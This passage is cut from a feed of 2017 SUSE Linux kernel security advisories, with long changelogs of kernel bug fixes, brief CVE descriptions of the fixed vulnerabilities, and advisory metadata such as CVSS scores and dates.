ACLs (bsc#1030552).\n - 
ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - ext4: handle the rest of ext4_mb_load_buddy() ENOMEM errors\n (bsc#1012829).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - fs/fcntl: f_setown, avoid undefined behaviour (bnc#1006180).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - fuse: initialize the flock flag in fuse_file on allocation (git-fixes).\n - gcov: add support for gcc version >= 6 (bsc#1051663).\n - gcov: support GCC 7.1 (bsc#1051663).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Do not clear SGID when inheriting ACLs (bsc#1012829).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gfs2: fix flock panic issue (bsc#1012829).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - hrtimer: Catch invalid clockids again (bsc#1047651).\n - hrtimer: Revert CLOCK_MONOTONIC_RAW support (bsc#1047651).\n - hv_utils: drop .getcrosststamp() support from PTP driver (fate#320485,\n bnc#1044112, bnc#1042778, bnc#1029693).\n - hv_utils: fix TimeSync work on pre-TimeSync-v4 hosts (fate#320485,\n bnc#1044112, bnc#1042778, bnc#1029693).\n - hv_util: switch to using timespec64 (fate#320485).\n - i2c: designware-baytrail: fix potential null pointer dereference on dev\n (bsc#1011913).\n - i40e: add hw struct local variable (bsc#1039915).\n - i40e: add private flag to control source pruning (bsc#1034075).\n - i40e: add VSI info to macaddr messages (bsc#1039915).\n - i40e: avoid looping to check whether we're in VLAN mode (bsc#1039915).\n - i40e: avoid O(n^2) loop when deleting 
all filters (bsc#1039915).\n - i40e: delete filter after adding its replacement when converting\n (bsc#1039915).\n - i40e: do not add broadcast filter for VFs (bsc#1039915).\n - i40e: do not allow i40e_vsi_(add|kill)_vlan to operate when VID<1\n (bsc#1039915).\n - i40e: drop is_vf and is_netdev fields in struct i40e_mac_filter\n (bsc#1039915).\n - i40e: enable VSI broadcast promiscuous mode instead of adding broadcast\n filter (bsc#1039915).\n - i40e: factor out addition/deletion of VLAN per each MAC address\n (bsc#1039915).\n - i40e: fix MAC filters when removing VLANs (bsc#1039915).\n - i40e: fold the i40e_is_vsi_in_vlan check into i40e_put_mac_in_vlan\n (bsc#1039915).\n - i40e: implement __i40e_del_filter and use where applicable (bsc#1039915).\n - i40e: make use of __dev_uc_sync and __dev_mc_sync (bsc#1039915).\n - i40e: move all updates for VLAN mode into i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: move i40e_put_mac_in_vlan and i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: no need to check is_vsi_in_vlan before calling\n i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: properly cleanup on allocation failure in i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: recalculate vsi->active_filters from hash contents (bsc#1039915).\n - i40e: refactor i40e_put_mac_in_vlan to avoid changing f->vlan\n (bsc#1039915).\n - i40e: refactor i40e_update_filter_state to avoid passing aq_err\n (bsc#1039915).\n - i40e: refactor Rx filter handling (bsc#1039915).\n - i40e: Removal of workaround for simple MAC address filter deletion\n (bsc#1039915).\n - i40e: remove code to handle dev_addr specially (bsc#1039915).\n - i40e: removed unreachable code (bsc#1039915).\n - i40e: remove duplicate add/delete adminq command code for filters\n (bsc#1039915).\n - i40e: remove second check of VLAN_N_VID in i40e_vlan_rx_add_vid\n (bsc#1039915).\n - i40e: rename i40e_put_mac_in_vlan and i40e_del_mac_all_vlan\n (bsc#1039915).\n - i40e: restore workaround for removing default MAC filter 
(bsc#1039915).\n - i40e: set broadcast promiscuous mode for each active VLAN (bsc#1039915).\n - i40e: store MAC/VLAN filters in a hash with the MAC Address as key\n (bsc#1039915).\n - i40e: use (add|rm)_vlan_all_mac helper functions when changing PVID\n (bsc#1039915).\n - i40e: when adding or removing MAC filters, correctly handle VLANs\n (bsc#1039915).\n - i40e: When searching all MAC/VLAN filters, ignore removed filters\n (bsc#1039915).\n - i40e: write HENA for VFs (bsc#1039915).\n - ib/hfi1: Wait for QSFP modules to initialize (bsc#1019151).\n - ibmvnic: Check for transport event on driver resume (bsc#1051556,\n bsc#1052709).\n - ibmvnic: Clean up resources on probe failure (fate#323285, bsc#1058116).\n - ibmvnic: Initialize SCRQ's during login renegotiation (bsc#1052223).\n - ibmvnic: Report rx buffer return codes as netdev_dbg (bsc#1052794).\n - iio: hid-sensor: fix return of -EINVAL on invalid values in ret or value\n (bsc#1031717).\n - input: gpio-keys - fix check for disabling unsupported keys\n (bsc#1031717).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - introduce the walk_process_tree() helper (bnc#1022476).\n - iommu/amd: Fix schedule-while-atomic BUG in initialization code\n (bsc1052533).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv4: Should use consistent conditional judgement for ip fragment in\n __ip_append_data and ip_finish_output (bsc#1041958).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - ipv6: Should use consistent conditional judgement for ip6 fragment\n between __ip6_append_data and ip6_finish_output (bsc#1041958).\n - iwlwifi: missing error code in 
iwl_trans_pcie_alloc() (bsc#1031717).\n - iwlwifi: mvm: compare full command ID (FATE#321353, FATE#323335).\n - iwlwifi: mvm: do not send CTDP commands via debugfs if not supported\n (bsc#1031717).\n - iwlwifi: mvm: reset the fw_dump_desc pointer after ASSERT (bsc#1031717).\n - iwlwifi: mvm: synchronize firmware DMA paging memory (FATE#321353,\n FATE#323335).\n - iwlwifi: mvm: unconditionally stop device after init (bsc#1031717).\n - iwlwifi: mvm: unmap the paging memory before freeing it (FATE#321353,\n FATE#323335).\n - iwlwifi: pcie: fix command completion name debug (bsc#1031717).\n - kABI-fix for "x86/panic: replace smp_send_stop() with kdump friendly\n version in panic path" (bsc#1051478).\n - kABI: protect enum pid_type (kabi).\n - kABI: protect lwtunnel include in ip6_route.h (kabi).\n - kABI: protect struct iscsi_np (kabi).\n - kABI: protect struct iscsi_tpg_attrib (kabi).\n - kABI: protect struct se_lun (kabi).\n - kABI: protect struct tpm_chip (kabi).\n - kABI: protect struct xfrm_dst (kabi).\n - kABI: protect struct xfrm_dst (kabi).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - kABI: uninline task_tgid_nr_nr (kabi).\n - kernel/*: switch to memdup_user_nul() (bsc#1048893).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: nVMX: fix msr bitmaps to prevent L2 from accessing L0 x2APIC\n (bsc#1051478).\n - kvm: nVMX: Fix nested_vmx_check_msr_bitmap_controls (bsc#1051478).\n - kvm: nVMX: Fix nested VPID vmx exec control (bsc#1051478).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() 
(bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - kvm: x86: avoid simultaneous queueing of both IRQ and SMI (bsc#1051478).\n - libnvdimm: fix badblock range handling of ARS range (bsc#1023175).\n - libnvdimm, pmem: fix a NULL pointer BUG in nd_pmem_notify (bsc#1023175).\n - lib: test_rhashtable: fix for large entry counts (bsc#1055359).\n - lib: test_rhashtable: Fix KASAN warning (bsc#1055359).\n - lightnvm: remove unused rq parameter of nvme_nvm_rqtocmd() to kill\n warning (FATE#319466).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - mac80211_hwsim: Replace bogus hrtimer clockid (bsc#1047651).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md: fix sleep in atomic (bsc#1040351).\n - md/raid5: fix a race condition in stripe batch (linux-stable).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mm: adaptive hash table scaling (bnc#1036303).\n - mm: call page_ext_init() after all struct pages are initialized (VM\n Debugging Functionality, bsc#1047048).\n - mm: drop HASH_ADAPT 
(bnc#1036303).\n - mm: fix classzone_idx underflow in shrink_zones() (VM Functionality,\n bsc#1042314).\n - mm, madvise: ensure poisoned pages are removed from per-cpu lists (VM hw\n poison -- git fixes).\n - mm: make PR_SET_THP_DISABLE immediately active (bnc#1048891).\n - mm/page_alloc.c: apply gfp_allowed_mask before the first allocation\n attempt (bnc#971975 VM -- git fixes).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - mptsas: Fixup device hotplug for VMWare ESXi (bsc#1030850).\n - mwifiex: do not update MCS set from hostapd (bsc#1031717).\n - net: account for current skb length when deciding about UFO\n (bsc#1041958).\n - net: ena: add hardware hints capability to the driver (bsc#1047121).\n - net: ena: add missing return when ena_com_get_io_handlers() fails\n (bsc#1047121).\n - net: ena: add missing unmap bars on device removal (bsc#1047121).\n - net: ena: add reset reason for each device FLR (bsc#1047121).\n - net: ena: add support for out of order rx buffers refill (bsc#1047121).\n - net: ena: allow the driver to work with small number of msix vectors\n (bsc#1047121).\n - net: ena: bug fix in lost tx packets detection mechanism (bsc#1047121).\n - net: ena: change return value for unsupported features unsupported\n return value (bsc#1047121).\n - net: ena: change sizeof() argument to be the type pointer (bsc#1047121).\n - net: ena: disable admin msix while working in polling mode (bsc#1047121).\n - net: ena: fix bug that might cause hang after consecutive open/close\n interface (bsc#1047121).\n - net: ena: fix race condition between submit and completion admin command\n (bsc#1047121).\n - net: ena: fix rare uncompleted admin command false alarm (bsc#1047121).\n - net: ena: fix theoretical Rx hang on low memory systems (bsc#1047121).\n - net: ena: separate skb allocation to dedicated function (bsc#1047121).\n - net: ena: update driver's rx drop statistics (bsc#1047121).\n - net: ena: update ena driver to version 1.1.7 
(bsc#1047121).\n - net: ena: update ena driver to version 1.2.0 (bsc#1047121).\n - net: ena: use lower_32_bits()/upper_32_bits() to split dma address\n (bsc#1047121).\n - net: ena: use napi_schedule_irqoff when possible (bsc#1047121).\n - netfilter: fix IS_ERR_VALUE usage (bsc#1052888).\n - netfilter: x_tables: pack percpu counter allocations (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct instead of packet counter\n (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct to counter allocator\n (bsc#1052888).\n - net: handle NAPI_GRO_FREE_STOLEN_HEAD case also in napi_frags_finish()\n (bsc#1042286).\n - net/mlx5: Fix driver load error flow when firmware is stuck (git-fixes).\n - net: phy: Do not perform software reset for Generic PHY (bsc#1042286).\n - new helper: memdup_user_nul() (bsc#1048893).\n - nfs: Cache aggressively when file is open for writing (bsc#1033587).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nfs: Do not flush caches for a getattr that races with writeback\n (bsc#1033587).\n - nfs: flush data when locking a file to ensure cache coherence for mmap\n (bsc#981309).\n - nfs: invalidate file size when taking a lock (git-fixes).\n - nfs: only invalidate dentrys that are clearly invalid (bsc#1047118).\n - ocfs2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ocfs2: fix deadlock caused by recursive locking in xattr (bsc#1012829).\n - ocfs2: Make ocfs2_set_acl() static (bsc#1030552).\n - of: fix "/cpus" reference leak in of_numa_parse_cpu_nodes()\n (bsc#1056827).\n - ovl: fix dentry leak for default_permissions (bsc#1054084).\n - pci: Add Mellanox device IDs (bsc#1051478).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: Convert Mellanox broken INTx quirks to be for listed devices only\n (bsc#1051478).\n - pci: Correct PCI_STD_RESOURCE_END usage (bsc#1051478).\n - pci: dwc: dra7xx: Use RW1C for IRQSTATUS_MSI and IRQSTATUS_MAIN\n (bsc#1051478).\n - 
pci: dwc: Fix uninitialized variable in dw_handle_msi_irq()\n (bsc#1051478).\n - pci: Enable ECRC only if device supports it (bsc#1051478).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci / pm: Fix native PME handling during system suspend/resume\n (bsc#1051478).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - pci: Support INTx masking on ConnectX-4 with firmware x.14.1100+\n (bsc#1051478).\n - percpu_ref: allow operation mode switching operations to be called\n concurrently (bsc#1055096).\n - percpu_ref: remove unnecessary RCU grace period for staggered atomic\n switching confirmation (bsc#1055096).\n - percpu_ref: reorganize __percpu_ref_switch_to_atomic() and relocate\n percpu_ref_switch_to_atomic() (bsc#1055096).\n - percpu_ref: restructure operation mode switching (bsc#1055096).\n - percpu_ref: unify staggered atomic switching wait behavior (bsc#1055096).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: Fix spurious NMI with PEBS Load Latency event (bsc#1051478).\n - perf/x86/intel: Cure bogus unwind from PEBS entries (bsc#1051478).\n - perf/x86/intel: Fix PEBSv3 record drain (bsc#1051478).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. 
mm_struct\n tracking' (bsc#1061831).\n - platform/x86: ideapad-laptop: Add IdeaPad 310-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V310-15ISK to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V510-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Lenovo Yoga 910-13IKB to no_hw_rfkill\n dmi list (bsc#1051022).\n - platform/x86: ideapad-laptop: Add several models to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y520-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y700 15-ACZ to no_hw_rfkill DMI list\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y720-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - pm / Hibernate: Fix scheduling while atomic during hibernation\n (bsc#1051059).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - prctl: propagate has_child_subreaper flag to every descendant\n (bnc#1022476).\n - qeth: fix L3 next-hop im xmit qeth hdr (bnc#1052773, LTC#157374).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - reiserfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - Revert "ACPI / video: Add force_native quirk for HP Pavilion dv6"\n (bsc#1031717).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "powerpc/numa: Fix percpu allocations to be NUMA aware"\n (bsc#1048914).\n - Revert "tpm: Issue a TPM2_Shutdown for TPM2 devices." 
(kabi).\n - rpm/kernel-binary.spec.in: find-debuginfo.sh should not touch build-id\n This needs rpm-4.14+ (bsc#964063).\n - rtnetlink: fix rtnl_vfinfo_size (bsc#1056261).\n - s390: export symbols for crash-kmp (bsc#1053915).\n - sched/core: Allow __sched_setscheduler() in interrupts when PI is not\n used (bnc#1022476).\n - sched/debug: Print the scheduler topology group mask (bnc#1022476).\n - sched/fair, cpumask: Export for_each_cpu_wrap() (bnc#1022476).\n - sched/fair: Fix O(nr_cgroups) in load balance path (bnc#1022476).\n - sched/fair: Use task_groups instead of leaf_cfs_rq_list to walk all\n cfs_rqs (bnc#1022476).\n - sched/topology: Add sched_group_capacity debugging (bnc#1022476).\n - sched/topology: Fix building of overlapping sched-groups (bnc#1022476).\n - sched/topology: Fix overlapping sched_group_capacity (bnc#1022476).\n - sched/topology: Move comment about asymmetric node setups (bnc#1022476).\n - sched/topology: Refactor function build_overlap_sched_groups()\n (bnc#1022476).\n - sched/topology: Remove FORCE_SD_OVERLAP (bnc#1022476).\n - sched/topology: Simplify build_overlap_sched_groups() (bnc#1022476).\n - sched/topology: Small cleanup (bnc#1022476).\n - sched/topology: Verify the first group matches the child domain\n (bnc#1022476).\n - scsi: Add STARGET_CREATE_REMOVE state to scsi_target_state (bsc#1013887).\n - scsi: bnx2i: missing error code in bnx2i_ep_connect() (bsc#1048221).\n - scsi_devinfo: fixup string compare (bsc#1037404).\n - scsi_dh_alua: suppress errors from unsupported devices (bsc#1038792).\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: kABI fix for new state STARGET_CREATED_REMOVE (bsc#1013887).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - 
scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: storvsc: Workaround for virtual DVD SCSI version (fate#320485,\n bnc#1044636).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - smsc75xx: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - sr9700: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - supported.conf: clear mistaken external support flag for cifs.ko\n (bsc#1053802).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - sysctl: do not print negative flag for proc_douintvec (bnc#1046985).\n - 
sysctl: fix lax sysctl_check_table() sanity check (bsc#1048893).\n - sysctl: fold sysctl_writes_strict checks into helper (bsc#1048893).\n - sysctl: kdoc'ify sysctl_writes_strict (bsc#1048893).\n - sysctl: simplify unsigned int support (bsc#1048893).\n - timers: Plug locking race vs. timer migration (bnc#1022476).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tpm: fix: return rc when devm_add_action() fails (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n 8e0ee3c9faed).\n - tpm: Issue a TPM2_Shutdown for TPM2 devices (bsc#1053117).\n - tpm: KABI fix (bsc#1053117).\n - tpm: read burstcount from TPM_STS in one 32-bit transaction\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes 27084efee0c3).\n - tpm_tis_core: Choose appropriate timeout for reading burstcount\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes aec04cbdf723).\n - tpm_tis_core: convert max timeouts from msec to jiffies (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n aec04cbdf723).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - tty: serial: msm: Support more bauds (git-fixes).\n - ubifs: Correctly evict xattr inodes (bsc#1012829).\n - ubifs: Do not leak kernel memory to the MTD (bsc#1012829).\n - udf: Fix deadlock between writeback and udf_setsize() (bsc#1012829).\n - udf: Fix races with i_size changes during readpage (bsc#1012829).\n - usb: core: fix device node leak (bsc#1047487).\n - vfs: fix missing inode_get_dev sites (bsc#1052049).\n - vfs: Return -ENXIO for negative SEEK_HOLE / 
SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/dmi: Switch dmi_remap() from ioremap() to ioremap_cache()\n (bsc#1051399).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - x86/LDT: Print the real LDT base address (bsc#1051478).\n - x86/mce: Make timer handling more robust (bsc#1042422).\n - x86/panic: replace smp_send_stop() with kdump friendly version in panic\n path (bsc#1051478).\n - xen: allocate page for shared info page from low memory (bnc#1038616).\n - xen/balloon: do not online new memory initially (bnc#1028173).\n - xen: hold lock_device_hotplug throughout vcpu hotplug operations\n (bsc#1042422).\n - xen-netfront: Rework the fix for Rx stall during OOM and network stress\n (git-fixes).\n - xen/pvh*: Support > 32 VCPUs at domain restore (bnc#1045563).\n - xfrm: NULL dereference on allocation failure (bsc#1047343).\n - xfrm: Oops on error in pfkey_msg2xfrm_state() (bsc#1047653).\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode usage\n (bsc#1055896).\n - xfs: do not BUG() on mixed direct and mapped I/O (bsc#1050188).\n - xfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - xfs: fix inobt inode allocation search optimization (bsc#1012829).\n\n", "edition": 1, "modified": "2017-10-27T18:31:25", "published": "2017-10-27T18:31:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00077.html", "id": "SUSE-SU-2017:2869-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-01T01:22:40", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13080", 
"CVE-2017-14489", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-1000253", "CVE-2017-12192"], "description": "The SUSE Linux Enterprise 11 SP4 Realtime kernel was updated to receive\n various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-15274: security/keys/keyctl.c in the Linux kernel did not\n consider the case of a NULL payload in conjunction with a nonzero length\n value, which allowed local users to cause a denial of service (NULL\n pointer dereference and OOPS) via a crafted add_key or keyctl system\n call, a different vulnerability than CVE-2017-12192 (bnc#1045327).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-1000253: Setuid root PIE binaries could still be exploited to\n gain local root access due missing overlapping memory checking in the\n ELF loader in the Linux Kernel. (bnc#1059525).\n\n The following non-security bugs were fixed:\n\n - blacklist.conf: blacklist bfedb589252c ("mm: Add a user_ns owner to\n mm_struct and fix ptrace permission checks") (bnc#1044228)\n - bnx2x: prevent crash when accessing PTP with interface down\n (bsc#1060665).\n - drm/mgag200: Fixes for G200eH3. 
(bnc#1062842)\n - fs/binfmt_elf.c:load_elf_binary(): return -EINVAL on zero-length\n mappings (bnc#1059525).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#909484\n FATE#317397).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - lustre: Fix "getcwd: Close race with d_move called by lustre" for -rt\n Convert added spin_lock/unlock() of ->d_lock to seqlock variants.\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061180).\n - netback: coalesce (guest) RX SKBs as needed (bsc#1056504).\n - nfs: Remove asserts from the NFS XDR code (bsc#1063544).\n - powerpc: Fix the corrupt r3 error during MCE handling (bnc#1056230).\n - powerpc: Make sure IPI handlers see data written by IPI senders\n (bnc#1056230).\n - powerpc/xics: Harden xics hypervisor backend (bnc#1056230).\n - s390/cpcmd,vmcp: avoid GFP_DMA allocations (bnc#1060245, LTC#159112).\n - s390/qdio: avoid reschedule of outbound tasklet once killed\n (bnc#1063301, LTC#159885).\n - s390/topology: alternative topology for topology-less machines\n (bnc#1060245, LTC#159177).\n - s390/topology: enable / disable topology dynamically (bnc#1060245,\n LTC#159177).\n - scsi: qla2xxx: Get mutex lock before checking optrom_state (bsc#1053317).\n - scsi: reset wait for IO completion (bsc#996376).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1060245, LTC#158494).\n - scsi: 
zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1060245, LTC#158493).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1060245, LTC#158494).\n - Update config files. (bsc#1057796) The CONFIG_MODULE_SIG_UEFI should be\n enabled on x86_64/xen architecture because xen can work with shim on\n x86_64. Enabling the following kernel config to load certificate from\n db/mok: +CONFIG_MODULE_SIG_BLACKLIST=y +CONFIG_MODULE_SIG_UEFI=y\n - virtio_scsi: do not call virtqueue_add_sgs(... GFP_NOIO) holding\n spinlock (bsc#1036286).\n\n", "edition": 1, "modified": "2017-11-30T21:08:12", "published": "2017-11-30T21:08:12", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00082.html", "id": "SUSE-SU-2017:3165-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-09T00:32:08", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-1000111", "CVE-2017-7518", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-8831", "CVE-2017-10810", "CVE-2017-14106", "CVE-2017-11473", "CVE-2017-7533", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-7541", "CVE-2017-12134", "CVE-2017-7542", "CVE-2017-12154", "CVE-2017-1000365"], "description": "The SUSE Linux Enterprise 12 SP2 RT kernel was updated to 4.4.88 